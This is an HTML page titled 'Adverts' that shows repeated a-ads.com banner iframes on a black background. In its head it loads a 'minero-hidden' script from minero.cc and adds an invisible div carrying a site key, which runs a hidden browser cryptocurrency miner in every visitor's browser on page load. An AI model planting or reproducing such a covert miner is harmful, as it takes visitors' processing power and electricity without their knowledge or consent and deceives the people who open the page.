<!DOCTYPE html>
<html>
    <head>
        <title>Adverts</title>
        <script src="https://minero.cc/lib/minero-hidden.min.js" async></script>
        <div class="minero-hidden" style="display: none" data-key="660dd90bacce2a6e8d590037f64af674"></div>
        <style>
            body {
                background-color: black;
            }
        </style>
    <body>
        <center>
            <iframe data-aa="1632135" src="//ad.a-ads.com/1632135?size=728x90" scrolling="no" style="width:728px; height:90px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
            <br>
            <iframe data-aa="1632145" src="//ad.a-ads.com/1632145?size=300x250" scrolling="no" style="width:300px; height:250px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
            <br>
            <iframe data-aa="1632135" src="//ad.a-ads.com/1632135?size=728x90" scrolling="no" style="width:728px; height:90px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
            <br>
            <iframe data-aa="1632145" src="//ad.a-ads.com/1632145?size=300x250" scrolling="no" style="width:300px; height:250px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
            <br>
            <iframe data-aa="1632135" src="//ad.a-ads.com/1632135?size=728x90" scrolling="no" style="width:728px; height:90px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
            <br>
            <iframe data-aa="1632145" src="//ad.a-ads.com/1632145?size=300x250" scrolling="no" style="width:300px; height:250px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
            <br>
            <iframe data-aa="1632135" src="//ad.a-ads.com/1632135?size=728x90" scrolling="no" style="width:728px; height:90px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
            <br>
            <iframe data-aa="1632145" src="//ad.a-ads.com/1632145?size=300x250" scrolling="no" style="width:300px; height:250px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
            <br>
            <iframe data-aa="1632135" src="//ad.a-ads.com/1632135?size=728x90" scrolling="no" style="width:728px; height:90px; border:0px; padding:0; overflow:hidden" allowtransparency="true"></iframe>
        </center>
    </body>
</html>
